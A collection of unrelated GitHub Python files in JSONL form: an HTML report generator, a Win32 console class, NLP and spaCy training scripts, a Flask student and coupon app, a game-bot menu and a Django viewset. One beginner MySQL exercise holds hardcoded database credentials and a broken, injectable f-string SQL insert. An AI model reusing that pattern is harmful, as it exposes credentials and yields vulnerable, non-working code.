+{"seq_id":"73361533685","text":"from itertools import chain, repeat\nfrom datetime import datetime\nfrom functools import partial\n\n\ndef nested_report(data, table_bp, columns, HTMLise, depth=2):\n    \"\"\"Assumes that all levels are nested dicts until a list of dicts\"\"\"\n    if isinstance(data, list):\n        yield table_bp\n        for line in data:\n            tds = [\"<td>{}</td>\".format(el) for el in\n                   [HTMLise(line=line, col=col) for col in columns]]\n            yield \"<tr>{}</tr>\".format(\"\".join(tds))\n        yield \"</table>\"\n    else:\n        for key, val in data.items():\n            yield chain(\n                [\"<h{}>{}</h{}>\".format(depth, key, depth)],\n                chain.from_iterable(\n                    repeat(el, 1) if isinstance(el, str)\n                    else el for el in nested_report(\n                        val, table_bp, columns, HTMLise, depth + 1)))\n\n\ndef file_path_to_url(file_path, line_count, config):\n    config_fpu = config.get(\"file_path_url\", {})\n    if not config_fpu:\n        return file_path\n    base = config_fpu[\"base_url\"]\n    branch = config_fpu.get(\"branch\", \"master\")\n    num = line_count if config_fpu.get(\"add_line\", True) else 0\n    file_path += '#L{}'.format(num)\n    url_path = \"/\".join([base, branch, file_path])\n    return \"<a href='{}'>{}</a>\".format(url_path, file_path)\n\n\ndef HTMLise_func(config, line, col):\n    if col == \"file_path\":\n        prefix = len(line.get(\"base_path\", \"\"))\n        return file_path_to_url(line[\"file_path\"][prefix:],\n                                line.get(\"line_count\", 0), config)\n    return line[col]\n\n\ndef html_summary(config, data):\n    config = config.get(__name__.split(\".\")[-1], {})\n    title = config.get(\"title\", \"Pycrastinate HTML report\")\n    columns = config.get(\"columns\",\n                         [\"token\", \"line_count\", \"file_path\", \"code\"])\n    css_rules = \"\\n\".join(config.get(\"css\",\n                          [\"td{font-family: monospace; border=1}\"]))\n    HTMLise = partial(HTMLise_func, config=config)\n    css = '<style>{}</style>'.format(css_rules)\n    html_start = [\"<html><head>{}<title>{}</title></head><body>\".format(css, title)]\n    if config.get(\"timestamp\", True):\n        html_start.append(\"<p>Generated at: {}</p>\".format(datetime.now()))\n    table_bp = \"<table><tr>{}</tr>\".format(\"\".join(\n        (\"<th>{}</th>\".format(col) for col in columns)))\n    report = chain([html_start],\n                   nested_report(data, table_bp, columns, HTMLise),\n                   [[\"</body></html>\"]])\n    return chain.from_iterable(repeat(el, 1) if isinstance(el, str)\n                               else el for el in report)\n","repo_name":"isaacbernat/pycrastinate","sub_path":"modules/html_summary.py","file_name":"html_summary.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"76"}
+{"seq_id":"26538048942","text":"#!/usr/bin/env python3\n\nfrom typing import (\n    Any as _Any,\n    Callable as _Callable,\n)\n\nimport asyncio as _asyncio\nimport logging as _logging\nimport threading as _threading\n\nfrom asyncio.windows_events import (\n    WindowsProactorEventLoopPolicy as _EventLoopPolicy,\n)\n\nfrom concurrent.futures import ThreadPoolExecutor as _Executor\n\nfrom ctypes import byref as _byref\n\nfrom ._console import _Console\n\nfrom ._win32api import (\n    DWORD as _DWORD,\n\n    Coord as _Coord,\n    SMALL_RECT as _SMALL_RECT,\n\n    CharInfo as _CharInfo,\n    ConsoleScreenBufferInfo as _ConsoleScreenBufferInfo,\n    SecurityAttributes as _SecurityAttributes,\n    KeyEventRecord as _KeyEventRecord,\n    InputRecord as _InputRecord,\n\n    INVALID_HANDLE_VALUE as _INVALID_HANDLE_VALUE,\n\n    CloseHandle as _CloseHandle,\n    CreateFileW as _CreateFileW,\n\n    FillConsoleOutputCharacterW as _FillConsoleOutputCharacterW,\n    FlushConsoleInputBuffer as _FlushConsoleInputBuffer,\n    GetConsoleMode as _GetConsoleMode,\n    GetConsoleScreenBufferInfo as _GetConsoleScreenBufferInfo,\n    ReadConsoleInputW as _ReadConsoleInputW,\n    ScrollConsoleScreenBufferW as _ScrollConsoleScreenBufferW,\n    SetConsoleCursorPosition as _SetConsoleCursorPosition,\n    SetConsoleMode as _SetConsoleMode,\n    WriteConsoleInputW as _WriteConsoleInputW,\n    WriteConsoleOutputCharacterW as _WriteConsoleOutputCharacterW,\n)\n\nfrom .. 
import events as _events\n\n\n_log = _logging.getLogger(__name__)\n\n# noinspection PyTypeChecker\n_asyncio.set_event_loop_policy(_EventLoopPolicy())\n\n\nclass Win32Console(_Console):\n\n def __init__(self) -> None:\n\n self._range_height = 0\n self._fill_char = ' '\n\n self._executor = None\n\n self._output = None\n self._saved_output_mode = None\n self._buffer_info = _ConsoleScreenBufferInfo()\n\n self._input_handler = None\n self._input_future = None\n\n self._executor = _Executor(max_workers=1)\n\n input_ = _CreateFileW('CONIN$', 0xc0000000, 0x3,\n _byref(_SecurityAttributes(None, True)),\n 3, 0x80, None)\n\n self._output = _CreateFileW('CONOUT$', 0xc0000000, 0x3,\n _byref(_SecurityAttributes(None, True)),\n 3, 0x80, None)\n\n mode = _DWORD()\n _GetConsoleMode(self._output, _byref(mode))\n self._saved_output_mode = mode.value\n\n _SetConsoleMode(self._output, self._saved_output_mode | 0x0018)\n\n self._update_buffer_info()\n\n self._input_handler = _ConsoleInputHandler(input_, close=True)\n\n loop = _asyncio.get_event_loop()\n self._input_future = loop.run_in_executor(self._executor,\n self._input_handler.handle)\n\n def __del__(self) -> None:\n\n self.close(timeout=0)\n\n # noinspection PyBroadException\n def close(self, timeout: float = 0.1) -> None:\n\n input_future, self._input_future = self._input_future, None\n input_handler, self._input_handler = self._input_handler, None\n output, self._output = self._output, None\n executor, self._executor = self._executor, None\n self._buffer_info = None\n\n if input_future is not None:\n\n try:\n input_future.cancel()\n\n except Exception:\n _log.exception(\"unable to cancel input handler during cleanup\")\n\n if input_handler is not None:\n\n try:\n input_handler.shutdown()\n\n except Exception:\n _log.exception(\n \"unable to shutdown input handler during cleanup\"\n )\n\n if (self._saved_output_mode is not None and\n output is not None and output != _INVALID_HANDLE_VALUE.value):\n\n try:\n _SetConsoleMode(output, self._saved_output_mode)\n\n except Exception:\n _log.exception(\n \"unable to reset console output mode during cleanup\"\n )\n\n if executor is not None:\n\n try:\n executor.shutdown(wait=False)\n\n except Exception:\n _log.exception(\"unable to shutdown executor during cleanup\")\n\n def _update_buffer_info(self) -> None:\n\n _GetConsoleScreenBufferInfo(self._output, _byref(self._buffer_info))\n\n def print(self, s: str, flush: bool = False) -> None:\n\n print(s, flush=flush)\n\n def get_width(self) -> int:\n\n return self._buffer_info.dwSize.X\n\n def get_height(self) -> int:\n\n window = self._buffer_info.srWindow\n return window.Bottom - window.Top + 1\n\n def get_colors(self) -> int:\n\n return 16\n\n def request_size(self, height: int) -> int:\n\n if height < 0:\n raise ValueError(\"n cannot be negative\")\n\n max_y = self._buffer_info.dwSize.Y - 1\n max_height = min(max_y, max(self._buffer_info.srWindow.Bottom -\n self._buffer_info.srWindow.Top, 3))\n\n if height > max_height:\n height = max_height\n\n if height == self._range_height:\n return height\n\n max_x = self._buffer_info.dwSize.X - 1\n y = self._buffer_info.dwCursorPosition.Y\n\n missing_lines = (height - self._range_height) - (max_y - y)\n if missing_lines > 0:\n _ScrollConsoleScreenBufferW(\n self._output, _SMALL_RECT(0, 0, max_x, y - 1), None,\n _Coord(0, -missing_lines),\n _CharInfo(self._fill_char, self._buffer_info.wAttributes)\n )\n\n self._range_height += missing_lines\n if self._range_height == height:\n return height\n\n delta = height - 
self._range_height\n if delta < 0:\n y += delta\n\n scroll_region = _SMALL_RECT(0, y, max_x, max_y)\n _ScrollConsoleScreenBufferW(\n self._output, scroll_region, scroll_region,\n _Coord(0, y + delta),\n _CharInfo(self._fill_char, self._buffer_info.wAttributes)\n )\n\n self._range_height += delta\n self._buffer_info.dwCursorPosition.Y += delta\n\n _SetConsoleCursorPosition(self._output,\n self._buffer_info.dwCursorPosition)\n\n assert self._range_height == height\n return height\n\n def line_at(self, y: int, text: str, tail: int = 0) -> None:\n\n y += self._buffer_info.dwCursorPosition.Y - self._range_height\n n = len(text)\n\n written = _DWORD()\n _WriteConsoleOutputCharacterW(self._output, text, n, _Coord(0, y),\n _byref(written))\n\n if tail <= 0:\n return\n\n _FillConsoleOutputCharacterW(self._output, self._fill_char, tail,\n _Coord(n, y), _byref(written))\n\n def register_input_callback(self, callback: _Callable) -> _Any:\n\n return self._input_handler.register_callback(callback)\n\n def unregister_input_callback(self, token: _Any) -> None:\n\n self._input_handler.unregister_callback(token)\n\n\nclass _ConsoleInputHandler:\n\n def __init__(self, handle, close=False) -> None:\n\n self._handle = handle\n self._close = close\n self._saved_mode = None\n self._callback = None\n self._callback_lock = None\n self._shutdown_signal = None\n\n mode = _DWORD()\n _GetConsoleMode(self._handle, _byref(mode))\n self._saved_mode = mode.value\n\n _SetConsoleMode(self._handle, self._saved_mode & ~0x0007 | 0x0018)\n\n self._callback_lock = _threading.Lock()\n self._shutdown_signal = _threading.Event()\n\n # noinspection PyBroadException\n def __del__(self) -> None:\n\n handle, self._handle = self._handle, None\n saved_mode, self._saved_mode = self._saved_mode, None\n\n if handle is not None and handle != _INVALID_HANDLE_VALUE.value:\n\n try:\n _FlushConsoleInputBuffer(handle)\n\n except Exception:\n _log.exception(\n \"unable to flush console input buffer during cleanup\"\n )\n\n if saved_mode is not None:\n\n try:\n _SetConsoleMode(handle, saved_mode)\n\n except Exception:\n _log.exception(\n \"unable to reset console input mode during cleanup\"\n )\n\n if self._close:\n\n try:\n _CloseHandle(handle)\n\n except Exception:\n _log.exception(\n \"unable to close console input handle during cleanup\"\n )\n\n def shutdown(self) -> None:\n\n self._shutdown_signal.set()\n\n input_record = _InputRecord(EventType=0x1, KeyEvent=_KeyEventRecord(\n wVirtualKeyCode=0xff,\n wVirtualScanCode=0xffff,\n ))\n written = _DWORD()\n _WriteConsoleInputW(self._handle, input_record, 1, _byref(written))\n\n def handle(self) -> None:\n\n # noinspection PyTypeChecker,PyCallingNonCallable\n buffer = (_InputRecord * 100)()\n read = _DWORD()\n\n while not self._shutdown_signal.is_set():\n\n _ReadConsoleInputW(self._handle, buffer, len(buffer), _byref(read))\n\n if self._shutdown_signal.is_set():\n break\n\n for input_record in buffer[:read.value]:\n\n if input_record.EventType != 0x0001:\n continue\n\n key_event = input_record.KeyEvent\n if not key_event.bKeyDown:\n continue\n\n vk = key_event.wVirtualKeyCode\n if vk == 0x1b:\n event = _events.QuitEvent()\n\n elif vk == 0x26:\n event = _events.UpNavEvent()\n\n elif vk == 0x28:\n event = _events.DownNavEvent()\n\n else:\n continue\n\n with self._callback_lock:\n if self._callback is None:\n continue\n\n loop, callback = self._callback\n\n loop.call_soon_threadsafe(callback, event)\n\n def register_callback(self, callback: _Callable) -> _Any:\n\n pair = _asyncio.get_running_loop(), 
callback\n\n with self._callback_lock:\n\n if self._callback is not None:\n raise NotImplementedError(\"cannot register multiple callbacks\")\n\n self._callback = pair\n\n return hash(pair)\n\n def unregister_callback(self, token: _Any) -> None:\n\n with self._callback_lock:\n\n if self._callback is None:\n raise ValueError(\"no callback has been registered\")\n\n if hash(self._callback) != token:\n raise ValueError(\"token mismatch\")\n\n self._callback = None\n","repo_name":"blubberdiblub/ezconsole","sub_path":"ezconsole/abstract/win32.py","file_name":"win32.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23307533790","text":"import os\nimport io\nfrom pathlib import Path\nimport pandas as pd\nimport glob\nimport pickle\nimport pycountry\nimport time\nfrom google.cloud import language_v1\nfrom text2int import text2int\n\n\n\n#os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'flash-surge-313319-fb0596b2676b.json'\nclient = language_v1.LanguageServiceClient()\n\ndf = pd.read_pickle(\"sections.pkl\")\n\ndef get_price(text_content):\n \"\"\"\n Analyzing Entities in a String\n\n Args:\n text_content The text content to analyze\n \"\"\"\n\n \n if not text_content or '2.02' not in text_content:\n return None\n else:\n text_content = text_content[:text_content.find('2.02')-3]\n \n # text_content = 'California is a state.'\n\n # Available types: PLAIN_TEXT, HTML\n type_ = language_v1.Document.Type.PLAIN_TEXT\n\n # Optional. If not specified, the language is automatically detected.\n # For list of supported languages:\n # https://cloud.google.com/natural-language/docs/languages\n language = \"en\"\n document = {\"content\": text_content, \"type_\": type_, \"language\": language}\n\n # Available values: NONE, UTF8, UTF16, UTF32\n encoding_type = language_v1.EncodingType.UTF8\n\n response = client.analyze_entities(request = {'document': document, 'encoding_type': encoding_type})\n\n # Loop through entitites returned from the API\n ans = []\n for entity in response.entities:\n if language_v1.Entity.Type(entity.type_).name == 'PRICE':\n# return entity.name\n ans.append(entity.name)\n# print(entity.name, language_v1.Entity.Type(entity.type_).name)\n time.sleep(0.25)\n return ans\n\ndf['Amount_G'] = df['ARTICLE II'].apply(get_price)\n\ndef get_amount(x):\n if not x:\n return None\n if len(x) == 1:\n return x[0]\n elif len(x) == 2:\n return x[1]\n elif len(x) == 4:\n # loan has two parts\n return [x[1], x[3]]\n else:\n # loan has\n return x[1]\n\ndf['Amount_G_num'] = df['Amount_G'].apply(get_amount)\n\ndef get_amount(x):\n curr = ''\n num = '0'\n if x:\n for i, s in enumerate(x):\n if not s.isdigit():\n curr += s\n else:\n num = x[i:]\n break\n return pd.Series([curr.strip(), num], index=['currency', 'Amount'])\n\ndf[['currency', 'Amount']] = df['Amount_G_num'].apply(get_amount)\n\ndef get_first_amount(x):\n amt = ''\n curr = ''\n if x:\n res = text2int(x[0].lower()).strip()\n if res[0].isdigit():\n for i,s in enumerate(res):\n if s.isdigit():\n amt += s\n else:\n curr = res[i:].strip()\n break\n else:\n for i,s in enumerate(res):\n if not s.isdigit():\n curr += s\n else:\n amt = res[i:].strip()\n break\n return pd.Series([curr, amt], index=['currency1', 'Amount1'])\ndf[['currency1', 'Amount1']] = df['Amount_G'].apply(get_first_amount)\n\ndef standard_curr(x):\n if 'dollar' in x or 'usd' in x or '$' in x:\n return 'us dollar'\n if 'japan' in x:\n return 'yen'\n if 'eur' in x:\n return 'euro'\n 
return x.strip()\ndf['currency_standard'] = df['currency1'].apply(standard_curr)\n\ndef standard_amt(x):\n if not x:\n return None\n else:\n return int(x.replace(',',''))\ndf['amount_standard'] = df['Amount1'].apply(standard_amt)\n\ndf.to_pickle(\"world_bank_amounts.pickle\")\n\n\n","repo_name":"xushuo0/Qarik-Project","sub_path":"extraction_pipeline/extract_loan_amounts.py","file_name":"extract_loan_amounts.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18298632881","text":"from flask import Flask, request, redirect, url_for, render_template, flash, session, request, abort\nfrom flask_login import LoginManager, login_user, logout_user, current_user, login_required\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import UserMixin\nimport os\nfrom db import *\nfrom models import User, Student\nfrom views import *\nfrom forms import *\nimport json\nimport utils\n\n\n# 初始化 Flask App 设置静态路径访问路径为\napp = Flask(__name__, static_url_path='')\n\n\n\n# 配置数据库连接\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db/pkd.sqlite3'\ninit_db(app) # 初始化数据库\n\n# login 密钥\napp.config['SECRET_KEY'] = os.urandom(24)\n\n# 登陆管理器配置\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login' # 若用户未登录,则自动跳转到指定页面,而不是提示\nlogin_manager.login_message_category = 'info' # 自定义消息分类\nlogin_manager.login_message = '请登录。' # 自定义消息\nlogin_manager.init_app(app)\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n if(isAdmin(session)):\n return User.query.get(int(user_id))\n else:\n return Student.query.get(int(user_id))\n\n# 模板全局变量 设置站点名称为PKD\n@app.context_processor\ndef inject_stage_and_region():\n return dict(siteName=\"PKD\")\n\n\n\n# 主页路由\n@app.route('/')\n@app.route('/index')\n@login_required\ndef index():\n # 判断用户类型\n if(isAdmin(session)):\n username = query_UserById(current_user.get_id()).username\n else:\n return redirect(url_for('coupon'))\n data = {\n \"title\": \"学生信息管理\",\n \"username\": username,\n \"fields\": query_Students_FieldsNotPwd(),\n \"students\": query_Students(),\n \"user_type\": session.get(\"user_type\")\n }\n return render_template('index.html', data=data)\n\n\n\n@app.route('/login', methods=['GET'])\ndef login():\n # 处理一个非预期的情况:假设用户已经登录,却导航到/login URL。需要导航到/index URL\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n return render_template('login.html')\n # username = request.form.get('username')\n # password = request.form.get('password')\n # remember = True if request.form.get('remember') else False\n # if request.method == 'POST':\n # user = query_User(username)\n # if user is None or not user.check_password(password):\n # flash('账号或用户名错误!')\n # return redirect(url_for('login'))\n\n # login_user(user, remember=remember)\n # return redirect(url_for('index'))\n\n # # GET 请求\n # return render_template('login.html')\n\n# 弃用\n@app.route('/charts')\n@login_required\ndef charts():\n return render_template('charts.html')\n\n# 优惠券路由\n@app.route('/coupon')\n@login_required\ndef coupon():\n username = None\n if(isAdmin(session)):\n username = query_UserById(current_user.get_id()).username\n else:\n username = query_StudentById(current_user.get_id()).name\n data = {\n \"title\": \"优惠券\",\n \"username\": username,\n \"user_type\": session.get('user_type')\n }\n return render_template('coupon.html', data=data)\n\n# 删除/清空优惠券\n@app.route('/ajax/coupon/del', methods=['GET', 'POST'])\n@login_required\ndef coupon_del_ajax():\n jsonData = \"\"\n if request.method == 
'POST':\n coupons = request.form.getlist('couponID') # 获取优惠券 couponID\n for coupon in coupons:\n del_KeyById(coupon) # 删除指定优惠券\n jsonData = json.dumps({\n \"status\": 200,\n \"msg\": f\"删除全部优惠券成功。\",\n \"data\": coupons\n })\n\n elif request.method == 'GET':\n del_KeyAll() # 删除全部优惠券\n jsonData = json.dumps({\n \"status\": 200,\n \"msg\": f\"删除全部优惠券成功。\"\n })\n return jsonData, 200\n\n\n# 添加优惠券\n@app.route('/ajax/coupon/add')\n@login_required\ndef coupon_add_ajax():\n args = request.args\n total = args.get(\"total\", type=int, default=10) # 获取要添加优惠券的总数\n if(total <= 0):\n return json.dumps({\n \"status\": 400,\n \"msg\": f\"添加失败,提交参���错误。\"\n }), 400\n keyset = generate_keys(total) # 生成 n 张优惠券\n count = keySet2DB(keyset) # 生成的优惠券加入数据库\n return json.dumps({\n \"status\": 200,\n \"msg\": f\"添加成功,共添加 {count} 张优惠券。\"\n }), 200\n\n# 获取优惠券数据\n@app.route('/ajax/coupon/data')\n@login_required\ndef coupon_data_ajax():\n keys = query_Keys()\n fields = query_Keys_Fields() # 获取 Key 全部字段\n keysList = query2List(fields, keys) # 对象转列表\n return json.dumps({\n \"status\": 200,\n \"msg\": \"优惠券获取成功。\",\n \"data\": keysList,\n \"fields\": fields\n }, indent=4, sort_keys=True, default=str), 200\n\n# 检查优惠券是否有效\n@app.route('/ajax/coupon/check', methods=['POST'])\ndef coupon_check_ajax():\n code = request.form.get('code', type=str)\n\n # 如果优惠券存在且有效\n if(keyIsExist(code) and keyIsUseful(code)):\n set_key_status(code, True) # 设置优惠券已使用\n return json.dumps({\n \"status\": 200,\n \"msg\": \"优惠券可用。\",\n \"status\": True\n }), 200\n else:\n return json.dumps({\n \"status\": 200,\n \"msg\": \"优惠券不可用。\",\n \"status\": False\n }), 200\n\n# ajax 登录\n@app.route('/ajax/login', methods=['GET', 'POST'])\ndef login_ajax():\n\n errorPWD = json.dumps({\"status\": 400, \"msg\": \"账号或用户名错误!\"})\n\n # 处理一个非预期的情况:假设用户已经登录,却导航到/login URL。需要导航到/index URL\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n\n username = request.form.get('username')\n password = request.form.get('password')\n remember = True if request.form.get('remember') else False\n userType = request.form.get('userType', default='admin')\n if request.method == 'POST':\n user = None\n if(userType == \"admin\"):\n user = query_User(username)\n elif(userType == \"student\"):\n user = query_StudentUser(username)\n else:\n return errorPWD, 400\n\n if user is None or not user.check_password(password):\n return errorPWD, 400\n\n next = request.form.get('next')\n\n if not utils.is_safe_url(next, request):\n return abort(400)\n\n login_user(user, remember=remember)\n session['user_type'] = userType\n\n # 如果 URL 中带有 next 参数则跳转到 next 页面\n # URL = 127.0.0.1/login?next=/index\n if(next): # next 不为空\n next = next\n else: # next 空\n next = url_for('index')\n return json.dumps({\"status\": 200, \"msg\": \"登录成功\", \"next\": next}), 200\n # GET 请求\n return json.dumps({\"status\": 400, \"msg\": \"请使用Post请求。\"}), 400\n\n# 登出\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return render_template('login.html')\n\n# ajax 登出\n@app.route('/ajax/logout')\n@login_required\ndef logout_ajax():\n logout_user()\n next = request.args.get('next')\n # 如果 URL 中带有 next 参数则跳转到 next 页面\n if(next): # next 不为空\n next = next\n else: # next 空\n next = url_for('index')\n return json.dumps({\"status\": 200, \"msg\": \"已注销。\", \"next\": next}), 200\n\n# 列出学生信息\n@app.route('/students/list', methods=['get'])\n@login_required\ndef get_students_list():\n # 返回不包含密码的其他记录\n return json.dumps(query_StudentsListNotPwd())\n\n# 添加学生信息\n@app.route('/student/add', 
methods=['POST'])\n@login_required\ndef student_add():\n if request is None:\n return json.dumps({\"status\": 400, \"msg\": \"添加失败,请重新填写。\"}), 400\n id = request.form.get('id', type=int)\n name = request.form.get('name', type=str)\n age = request.form.get('age', type=int, default=None)\n funds = request.form.get('funds', type=float, default=None)\n addr = request.form.get('addr', type=str, default=None)\n honor = request.form.get('honor', type=str, default=None)\n password = request.form.get('password', type=str, default=None)\n\n if name == '':\n return json.dumps({\"status\": 400, \"msg\": \"添加失败,请输入姓名。\"}), 400\n\n stu = Student(id=id, name=name, age=age,funds=funds, addr=addr, honor=honor)\n stu.set_password_hash(password) # 密码 hash 加密\n add_Student(stu)\n return json.dumps({\"status\": 200, \"msg\": f\"添加用户 {name} 成功。\"}), 200\n\n# 删除学生\n@app.route('/student/del', methods=['POST'])\n@login_required\ndef student_del():\n if request is None:\n return json.dumps({\"status\": 400, \"msg\": \"删除失败,请刷新重试。\"}), 400\n id = request.form.get('id', type=int)\n if id == None:\n return json.dumps({\"status\": 400, \"msg\": \"删除失败,请刷新��试。\"}), 400\n del_StudentById(id)\n return json.dumps({\"status\": 200, \"msg\": f\"删除 ID 为 {id} 的用户成功。\"}), 200\n\n# 编辑学生\n@app.route('/student/edit', methods=['POST'])\n@login_required\ndef student_edit():\n if request is None:\n return json.dumps({\"status\": 400, \"msg\": \"修改失败,请刷新重试。\"}), 400\n\n id = request.form.get('id', type=int)\n name = request.form.get('name', type=str)\n age = request.form.get('age', type=int, default=None)\n funds = request.form.get('funds', type=float, default=None)\n addr = request.form.get('addr', type=str, default=None)\n honor = request.form.get('honor', type=str, default=None)\n password = request.form.get('password', type=str, default=None)\n stu = query_StudentById(id)\n if id is None or stu is None:\n return json.dumps({\"status\": 400, \"msg\": \"修改失败,请刷新重试。\"}), 400\n stuEdit = Student(id=id, name=name, age=age,funds=funds, addr=addr, honor=honor)\n if(password!=None and password!=\"\"):\n stuEdit.set_password_hash(password)\n else:\n stuEdit.password=stu.password\n edit_Student(stuEdit)\n return json.dumps({\"status\": 200, \"msg\": f\"修改 ID 为 {id} 的用户成功。\"}), 200\n\n\n@app.route('/student/columns', methods=['POST'])\n@login_required\ndef student_columns():\n # fields = query_Students_Fields()\n pass\n\n# @app.teardown_request\n# def shutdown_session(exception=None):\n# db.remove()\n\n\n# 防止被引用后执行,只有在当前模块中才可以使用\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","repo_name":"YuLiang28/PKD","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71359708407","text":"from flask_mysqldb import MySQLdb\nfrom contextlib import closing\n\n__dados = {'host': \"mysql.topskills.study\",\n 'database': 'topskills01',\n 'user': 'topskills01',\n 'passwd': 'ts2019',\n 'port': 3306}\n\ndef cadastrar (nome, idade, telefone):\n with closing(MySQLdb.connect(**__dados)) as conn:\n cursor = conn.cursor()\n cursor.execute (f\"INSERT INTO topskills01.danielilagacione(nome, idade, telefone)VALUES('{nome}',{idade}');\")\n conn.commit()\n\ndef consultarAll():\n with closing(MySQLdb.connect(**__dados)) as conn:\n cursor = conn.cursor()\n cursor.execute('SELECT * FROM danielilagacione')\n print('\\nSó uma linha: ', cursor.fetchone())\n print('\\nVárias linhas',cursor.fetchall())\n\nfor i in range (3):\n 
nome = input('Digite Nome:')\n idade = int(input('Digite a idade:'))\n telefone = int(input('Digite o telefone:'))\n cadastrar(nome, idade)\n\nconsultarAll() \n","repo_name":"danylagacione/TrabalhosPython","sub_path":"Aula30/aula31.py","file_name":"aula31.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43008004410","text":"from __future__ import unicode_literals, print_function\n\nimport srsly\nimport plac\nimport random\nfrom pathlib import Path\nimport spacy\nfrom spacy.util import minibatch, compounding\n\ninput_model = \"en_core_web_md\"\noutput_model = \"en_core_ner_v11\"\nfpath = \"data/ner_profile_train_v11.jsonl\"\n\n# load_TRAIN_DATA\nobj = srsly.read_jsonl(fpath)\nTRAIN_DATA = []\nfor record in obj:\n if record[\"answer\"] == \"accept\":\n spans = record.get(\"spans\", [])\n entities = [(span[\"start\"], span[\"end\"], span[\"label\"]) for span in spans]\n TRAIN_DATA.append((record[\"text\"], {\"entities\": entities}))\n\nprint(\"training data size:\")\nprint(len(TRAIN_DATA))\n\n\n@plac.annotations(\n model=(\"Model name. Defaults to blank 'en' model.\", \"option\", \"m\", str),\n new_model_name=(\"New model name for model meta.\", \"option\", \"nm\", str),\n output_dir=(\"Optional output directory\", \"option\", \"o\", Path),\n n_iter=(\"Number of training iterations\", \"option\", \"n\", int),\n)\ndef main(\n model=input_model, new_model_name=output_model, output_dir=output_model, n_iter=1000\n):\n \"\"\"Set up the pipeline and entity recognizer, and train the new entity.\"\"\"\n random.seed(0)\n if model is not None:\n nlp = spacy.load(model) # load existing spaCy model\n print(\"Loaded model '%s'\" % model)\n else:\n nlp = spacy.blank(\"en\") # create blank Language class\n print(\"Created blank 'en' model\")\n # Add entity recognizer to model if it's not in the pipeline\n # nlp.create_pipe works for built-ins that are registered with spaCy\n if \"ner\" not in nlp.pipe_names:\n ner = nlp.create_pipe(\"ner\")\n nlp.add_pipe(ner, last=True)\n # otherwise, get it, so we can add labels to it\n else:\n ner = nlp.get_pipe(\"ner\")\n\n # add labels\n for _, annotations in TRAIN_DATA:\n for ent in annotations.get(\"entities\"):\n ner.add_label(ent[2])\n\n # get names of other pipes to disable them during training\n pipe_exceptions = [\"ner\", \"trf_wordpiecer\", \"trf_tok2vec\"]\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n with nlp.disable_pipes(*other_pipes): # only train NER\n # reset and initialize the weights randomly – but only if we're\n # training a new model\n if model is None:\n nlp.begin_training()\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n losses = {}\n # batch up the examples using spaCy's minibatch\n batches = minibatch(TRAIN_DATA, size=compounding(4.0, 32.0, 1.001))\n for batch in batches:\n texts, annotations = zip(*batch)\n nlp.update(\n texts, # batch of texts\n annotations, # batch of annotations\n drop=0.5, # dropout - make it harder to memorise data\n losses=losses,\n )\n print(\"Losses\", losses)\n\n # save model to output directory\n if output_dir is not None:\n output_dir = Path(output_dir)\n if not output_dir.exists():\n output_dir.mkdir()\n nlp.to_disk(output_dir)\n print(\"Saved model to\", output_dir)\n\n\nif __name__ == \"__main__\":\n 
plac.call(main)\n","repo_name":"TangHan54/spacy_train_ner_model","sub_path":"train_ner_model.py","file_name":"train_ner_model.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7975870720","text":"from ui.screen import Screen\n\nfrom utils.config import Config\nfrom utils.configurator import Configurator\nfrom jobs.helpers.circus_handler import CircusHandler\nfrom jobs.buffer import Buffer\n\nclass CircusScreen(Screen):\n\n buttons = [['Get quests', 'quests'], ['Go to dungeon', 'dungeon'], ['Go to dungeon with party', 'party_dungeon'], ['Back', 'back']]\n\n def __init__(self, message, bot):\n super().__init__(message, bot)\n self.title = 'Circus:'\n self.load_config()\n\n def render(self, call=None):\n self.markup.keyboard = []\n for b in self.buttons:\n self.markup.add(self.InlineKeyboardButton(b[0],\n callback_data='{name}.{action}'.format(name=self.name, action=b[1].lower())))\n if call is None:\n self.send()\n else:\n self.edit(call)\n\n def quests(self, call, state):\n self.bot.answer_callback_query(call.id, 'Get circus quests')\n\n buff_cfg = Configurator(self.config['buffer']).from_yaml()\n buff_cfg['spawn'] = True\n buff_cfg['logout'] = True\n\n buff = Buffer(buff_cfg)\n\n for i in range(8):\n CircusHandler().get_quest()\n buff.process_flow()\n\n return None, None\n\n def dungeon(self, call, state):\n CircusHandler().go_to_dungeon(False)\n return None, None\n\n def party_dungeon(self, call, state):\n CircusHandler().go_to_dungeon(True)\n return None, None\n\n def back(self, call, state):\n ss = state['StartScreen']\n ss.render(call=call)\n return ss.name, ss\n\n def load_config(self):\n Config().initialize_configs(self.config['navigator'])","repo_name":"MaxymHybalo/serial_bot","sub_path":"ui/circus_screen.py","file_name":"circus_screen.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35903743930","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django_filters import FilterSet\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom core.models import Order\nfrom core.serializers import OrderSerializer\n\n\nclass OrderFilterSet(FilterSet):\n class Meta:\n model = Order\n fields = {\n 'ordered': 